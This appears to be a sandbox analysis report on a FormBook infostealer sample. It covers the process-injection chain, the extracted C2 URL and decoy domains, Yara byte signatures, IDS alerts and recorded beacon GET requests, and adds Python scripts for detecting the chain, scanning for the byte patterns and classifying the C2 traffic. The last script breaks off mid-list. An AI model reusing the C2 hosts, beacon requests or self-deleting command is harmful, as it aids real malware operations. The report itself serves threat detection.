
Analysis Report 4oItdZkNOZ.exe

Overview

General Information

Sample Name: 4oItdZkNOZ.exe
Analysis ID: 385307
MD5: 36cf33e57ccccf3754b57ab14e623e57
SHA1: f54422966fd1e5f8180f618a51c938372d3711be
SHA256: 9914c8ad9ea0318f57214c6eb2f2e3f891b71ba054a9de071432ec92eb6bfe0d
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 4oItdZkNOZ.exe (PID: 4744 cmdline: 'C:\Users\user\Desktop\4oItdZkNOZ.exe' MD5: 36CF33E57CCCCF3754B57AB14E623E57)
    • 4oItdZkNOZ.exe (PID: 3540 cmdline: 'C:\Users\user\Desktop\4oItdZkNOZ.exe' MD5: 36CF33E57CCCCF3754B57AB14E623E57)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 5708 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 4928 cmdline: /c del 'C:\Users\user\Desktop\4oItdZkNOZ.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
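The process tree above is the visible trace of the injection chain the signatures describe (suspended child, process hollowing, injection into explorer.exe, a bare cscript.exe that then deletes the dropper). The following detection logic is an added example, not part of the Joe Sandbox report: it replays constructed process-creation events built from the PIDs, image paths and command lines printed in the tree and flags the three relationships a hunter would look for. The field names (pid, ppid, image, cmdline) follow the shape of a Sysmon Event ID 1 record and are an assumption, as are the launcher PID of the first process and the explorer.exe and cmd.exe image paths, which the report does not print.

```python
"""Flag the FormBook-style injection chain from process-creation events.

Added example; the events are constructed from the report's Startup tree.
Field names, the launcher PID (1000) and the explorer.exe / cmd.exe image
paths are assumptions, not data from the report.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


SAMPLE = r"C:\Users\user\Desktop\4oItdZkNOZ.exe"

# Constructed from the report's process tree (PID 1000 is an assumed launcher).
EVENTS: List[ProcEvent] = [
    ProcEvent(4744, 1000, SAMPLE, f"'{SAMPLE}'"),
    ProcEvent(3540, 4744, SAMPLE, f"'{SAMPLE}'"),                       # sample re-launches itself
    ProcEvent(3440, 3540, r"C:\Windows\explorer.exe", ""),               # path assumed; no cmdline recorded
    ProcEvent(5708, 3440, r"C:\Windows\SysWOW64\cscript.exe", r"C:\Windows\SysWOW64\cscript.exe"),
    ProcEvent(4928, 5708, r"C:\Windows\SysWOW64\cmd.exe", f"/c del '{SAMPLE}'"),  # cmd.exe path assumed
    ProcEvent(952, 4928, r"C:\Windows\system32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe"}
DEL_RE = re.compile(r"/c\s+del\s+['\"]?([^'\"]+?)['\"]?\s*$", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def index_by_pid(events: List[ProcEvent]) -> Dict[int, ProcEvent]:
    return {e.pid: e for e in events}


def ancestors(idx: Dict[int, ProcEvent], pid: int) -> Iterator[ProcEvent]:
    """Walk the parent chain of pid, nearest parent first; stops at unknown PIDs."""
    seen = {pid}
    cur = idx.get(pid)
    while cur is not None and cur.ppid in idx and cur.ppid not in seen:
        cur = idx[cur.ppid]
        seen.add(cur.pid)
        yield cur


def detect(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule_name) for every event that matches one of the three rules."""
    idx = index_by_pid(events)
    findings: List[Tuple[int, str]] = []
    for e in events:
        parent = idx.get(e.ppid)
        # 1. An image starting a second copy of itself: the suspended child the packer hollows.
        if parent is not None and parent.image.lower() == e.image.lower():
            findings.append((e.pid, "self_spawn"))
        # 2. explorer.exe starting a script host whose command line is only the binary, no script.
        if (parent is not None and basename(parent.image) == "explorer.exe"
                and basename(e.image) in SCRIPT_HOSTS
                and e.cmdline.strip().strip("'\"").lower() == e.image.lower()):
            findings.append((e.pid, "script_host_no_script"))
        # 3. cmd.exe deleting the on-disk image of one of its own ancestors: the dropper removing itself.
        if basename(e.image) == "cmd.exe":
            m = DEL_RE.search(e.cmdline)
            if m and any(a.image.lower() == m.group(1).lower() for a in ancestors(idx, e.pid)):
                findings.append((e.pid, "self_delete"))
    return findings


if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"PID {pid}: {rule}")
```

One caveat when carrying this outside the sandbox: the report draws explorer.exe under the sample because code was injected into it, whereas in endpoint telemetry explorer.exe's parent is a logon process. Rule 1 and rule 3 therefore survive unchanged, but the injection step itself has to come from the memory and API indicators (suspended process creation, thread context changes, queued APCs) rather than from a parent/child edge; rule 2 (explorer.exe starting a script host with nothing to run) is the part of the post-injection behaviour that still shows up as a process event.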

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.th0rgramm.com/hx3a/"], "decoy": ["xn--ol-xia.com", "gracieleesgiftsandmore.com", "invenufas.com", "nexgencoder.com", "virginiabrightseleccion.com", "selectenergyservicestx.com", "warchocki.com", "xn--comercialvioo-tkb.website", "losangelesbraiders.com", "skaraonline.com", "freeworldsin.com", "jabberjawmobile.com", "orgoneartist.com", "xyfzfl.com", "arooko.com", "investmentpartners.limited", "ugonget.com", "ringforklift.com", "recovatek.com", "bukannyaterbuai24.com", "formula-kuhni.com", "cyfss.com", "stkify.com", "aksharnewtown.com", "libroricardoanaya.com", "phillhutt.com", "mywinnersworld.com", "school17obn.com", "cocoshop.info", "netzcorecloud.com", "bookbeachchairs.com", "summitsolutionsnow.com", "yakudatsu-hikaku.com", "elitedrive.net", "jjwheelerphotography.com", "motcamket.com", "hatikuturkila.com", "tonton-koubou.com", "roughcuttavernorder.com", "leagueofconsciouscreatives.com", "worldsabroad.com", "ezmodafinil.com", "apettelp.club", "xn--jvrr98g37n88d.com", "gobiodisc.com", "alliedcds.com", "jillspickles.com", "alfenas.info", "herbalyesman.xyz", "sugary-sweet.com", "rigscart.com", "curiget.xyz", "stacksyspro.net", "sxqyws.net", "solocubiertos.com", "actuualizarinfruma.com", "thecurmudgeonsspeakout.com", "paydaegitimkurumlari.com", "sellingdealsinheels.com", "dezhou8.xyz", "thelitigatorsbookclub.com", "rainbowsdepot.com", "serenityislegalveston.com", "contactredzonetalent.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings (listed beneath each row)
00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(16 further memory-dump entries not shown)

      Unpacked PEs

Source | Rule | Description | Author | Strings (listed beneath each row)
1.2.4oItdZkNOZ.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.4oItdZkNOZ.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.4oItdZkNOZ.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
1.1.4oItdZkNOZ.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.1.4oItdZkNOZ.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further unpacked-PE entries not shown)
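The two Yara rules above match on raw byte sequences, and the same sequences recur at offsets that differ between the memory dumps and the unpacked PE because the dumps carry different image bases and headers. The scanner below is an added example (not from the report and not the rule authors' code): it searches a buffer for the same byte strings and reports every offset, the way the Strings column does, and it decodes the JPCERT rule's three strings, which are each a five-byte `push imm32` (opcode 68) of a 32-bit constant. $sequence_0 is worth reading as code: `03 C8 0F 31 2B C1 89 45 FC` is `add ecx,eax; rdtsc; sub eax,ecx; mov [ebp-4],eax`, the timing read behind the "Tries to detect virtualization through RDTSC time measurements" signature. The buffer scanned here is constructed for the example; the sample itself is not embedded, so the offsets are not the report's, and the sqlite3 naming of the constants is the rule authors' and is not verified here.

```python
"""Re-create the report's Yara string hits by scanning a buffer for byte sequences.

Added example. Patterns are copied from the report's Yara Overview; the buffer
is constructed here (the real sample is not embedded, so offsets differ).
"""
import struct
from typing import Dict, List

# Strings of the Formbook_1 rule (Felix Bilstein / yara-signator), as printed in the report.
FORMBOOK_1: Dict[str, str] = {
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",  # add ecx,eax ; rdtsc ; sub eax,ecx ; mov [ebp-4],eax
    "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "$sequence_4": "5D C3 8D 50 7C 80 FA 07",
    "$sequence_8": "3C 54 74 04 3C 74 75 F4",
}
# Strings of the JPCERT/CC 'Formbook' rule: each is 'push imm32' (68 xx xx xx xx).
JPCERT: Dict[str, str] = {
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}


def hex_to_bytes(hexstr: str) -> bytes:
    return bytes.fromhex(hexstr.replace(" ", ""))


def scan(buf: bytes, patterns: Dict[str, str]) -> Dict[str, List[int]]:
    """Return {string_name: [offsets]} for every pattern found in buf, all occurrences."""
    hits: Dict[str, List[int]] = {}
    for name, hexstr in patterns.items():
        needle = hex_to_bytes(hexstr)
        offsets, pos = [], buf.find(needle)
        while pos != -1:
            offsets.append(pos)
            pos = buf.find(needle, pos + 1)
        if offsets:
            hits[name] = offsets
    return hits


def push_imm32(hexstr: str) -> int:
    """Decode a five-byte 'push imm32' and return its little-endian immediate."""
    b = hex_to_bytes(hexstr)
    if len(b) != 5 or b[0] != 0x68:
        raise ValueError("not a push imm32 encoding")
    return struct.unpack("<I", b[1:])[0]


def all_present(hits: Dict[str, List[int]], patterns: Dict[str, str]) -> bool:
    """True when every string of the rule set was found at least once."""
    return all(name in hits for name in patterns)


def build_test_buffer() -> bytes:
    """Constructed buffer: 0x90 (nop) filler with the patterns placed at known offsets."""
    buf = bytearray(b"\x90" * 0x100)

    def put(off: int, hexstr: str) -> None:
        b = hex_to_bytes(hexstr)
        buf[off:off + len(b)] = b

    put(0x10, FORMBOOK_1["$sequence_0"])
    put(0x40, FORMBOOK_1["$sequence_0"])  # the report also lists two hits for $sequence_0
    put(0x80, JPCERT["$sqlite3step"])
    put(0x90, JPCERT["$sqlite3text"])
    put(0xA0, JPCERT["$sqlite3blob"])
    return bytes(buf)


if __name__ == "__main__":
    buf = build_test_buffer()
    for name, offs in {**scan(buf, FORMBOOK_1), **scan(buf, JPCERT)}.items():
        print(name, [hex(o) for o in offs])
    for name, hexstr in JPCERT.items():
        print(f"{name}: push 0x{push_imm32(hexstr):08X}")
```

Offsets reported by `scan` are offsets into the buffer as scanned, so when hunting across dumps of the same payload, compare the relative spacing between hits (for example the two $sequence_0 hits are 0x39a apart in both the memory dump and the unpacked PE above) rather than the absolute values.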

          Sigma Overview

          No Sigma rule has matched

          Signature Overview


          AV Detection:

Antivirus detection for URL or domain
Source: http://www.aksharnewtown.com/hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7py | Avira URL Cloud: Label: malware
Source: http://www.alliedcds.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA== | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (configuration as printed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nsv773C.tmp\m9c3uhgbfqo.dll | ReversingLabs: Detection: 10%
Multi AV Scanner detection for submitted file
Source: 4oItdZkNOZ.exe | Virustotal: Detection: 30%
Source: 4oItdZkNOZ.exe | ReversingLabs: Detection: 33%
Yara detected FormBook
Source: Yara match | File source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPE
Source: 1.2.4oItdZkNOZ.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.4oItdZkNOZ.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.cscript.exe.4784e8.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 3.2.cscript.exe.4f57960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 4oItdZkNOZ.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: cscript.pdbUGP | source: 4oItdZkNOZ.exe, 00000001.00000002.388207380.0000000000A60000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000002.00000000.366018539.0000000007AA0000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: 4oItdZkNOZ.exe, 00000000.00000003.341988783.000000001EFD0000.00000004.00000001.sdmp, 4oItdZkNOZ.exe, 00000001.00000002.388229067.0000000000B10000.00000040.00000001.sdmp, cscript.exe, 00000003.00000002.604526316.0000000004B3F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: 4oItdZkNOZ.exe, cscript.exe
Source: Binary string: cscript.pdb | source: 4oItdZkNOZ.exe, 00000001.00000002.388207380.0000000000A60000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000002.00000000.366018539.0000000007AA0000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\4oItdZkNOZ.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\4oItdZkNOZ.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\4oItdZkNOZ.exe | Code function: 0_2_004026BC FindFirstFileA,
Source: C:\Users\user\Desktop\4oItdZkNOZ.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop edi

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49697 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49697 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49697 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49713 -> 172.67.210.123:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49713 -> 172.67.210.123:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49713 -> 172.67.210.123:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.th0rgramm.com/hx3a/
Source: global traffic | HTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=fCmUcBRhMrUy3w+kl11B/xiypSW2fUD8cU7Pu3gqArK5c3pJn3j9k/DsIYu7GSRGk0uMV4XXlw== HTTP/1.1 | Host: www.recovatek.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA== HTTP/1.1 | Host: www.alliedcds.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /hx3a/?yvLp6=brq1n3aPok8cFP+QyTVVGry8TF4KLIKYulSDbrE0IIbdXAl5b54voPCnFdnaruz10AJ9JKXZsg==&6l=t8eTzfA8rB7py HTTP/1.1 | Host: www.investmentpartners.limited | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=gkm2pEh8KEmpulawdvJ1V43zAdeU214KS2HTFZoK2O2SsOEqfkF7FZJwvCYR1UF8Rs6N914p1Q== HTTP/1.1 | Host: www.stacksyspro.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7py HTTP/1.1 | Host: www.aksharnewtown.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpQ9kpTkv8g1Bmau5WA== HTTP/1.1 | Host: www.tonton-koubou.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /hx3a/?yvLp6=caEAE6TOQuxSMBR5BS8nf+GDaIfP+W5I+A7g/UPOg7+JEug9q1NgoLt4ZSWomvYtgt6I+7SvKg==&6l=t8eTzfA8rB7py HTTP/1.1 | Host: www.formula-kuhni.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /hx3a/?yvLp6=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVskl66UoDGo5EztP+UQ==&6l=t8eTzfA8rB7py HTTP/1.1 | Host: www.xn--ol-xia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=qBahC4CKT3yOn5twSoz5N4YsmdYqg0jdF6L89PfdPPedh7rnw+4FXiJe9HO6V7yUZIpJ8/Yz5A== HTTP/1.1 | Host: www.ugonget.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /hx3a/?yvLp6=cNQmpavEJfLRVSDxdHUFAARwayWBvklnexOaeKif2gi+yGNN3QCAF1RUuDonfjyO2vX8uvakBQ==&6l=t8eTzfA8rB7py HTTP/1.1 | Host: www.jabberjawmobile.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: global traffic | HTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1w7wouCbacCZl2dqvUI+ajsT2GFRHOaP55G6g== HTTP/1.1 | Host: www.yakudatsu-hikaku.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (not printable)
Source: Joe Sandbox View | IP Address: 23.227.38.74
Source: Joe Sandbox View | ASN Name: INTERQGMOInternetIncJP
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: WEBHOST1-ASRU
Source: unknown | DNS traffic detected: queries for: www.recovatek.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Mon, 12 Apr 2021 08:04:03 GMT | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 19 | Connection: close | Data Raw: 34 30 34 20 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e | Data Ascii: 404 File not found.
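The extracted configuration (Malware Configuration section) names one C2 URL and 64 decoy domains, and the eleven GETs recorded above all share the configured path (/hx3a/), a constant parameter value (t8eTzfA8rB7py) and a 76-character base64 blob whose parameter name and position vary. The script below is an added example, not part of the Joe Sandbox report, that checks those requests against the configuration: it classifies each Host as C2, decoy or unknown, confirms the path, separates the constant token from the variable blob, and groups hosts by the token, which is the value a hunter can pivot on before the C2 host is known. The configuration (C2 plus the eleven decoys that appear in the traffic, a subset of the 64) and the request targets are copied from the report; the (host, request-target) tuple format is an assumption made for this example and is not a log format the sandbox emits.

```python
"""Check recorded FormBook GETs against the extracted configuration.

Added example. Config (C2 plus a subset of the report's 64 decoys) and request
targets are copied from the report; the (host, target) input shape is assumed.
"""
import base64
import json
import re
from typing import Dict, List, Optional, Set, Tuple

CONFIG_JSON = """{
  "C2 list": ["www.th0rgramm.com/hx3a/"],
  "decoy": ["xn--ol-xia.com", "investmentpartners.limited", "ugonget.com", "recovatek.com",
            "formula-kuhni.com", "aksharnewtown.com", "yakudatsu-hikaku.com", "jabberjawmobile.com",
            "tonton-koubou.com", "alliedcds.com", "stacksyspro.net"]
}"""

# (Host header, request target) for each GET the report recorded.
REQUESTS: List[Tuple[str, str]] = [
    ("www.recovatek.com", "/hx3a/?6l=t8eTzfA8rB7py&yvLp6=fCmUcBRhMrUy3w+kl11B/xiypSW2fUD8cU7Pu3gqArK5c3pJn3j9k/DsIYu7GSRGk0uMV4XXlw=="),
    ("www.alliedcds.com", "/hx3a/?6l=t8eTzfA8rB7py&yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA=="),
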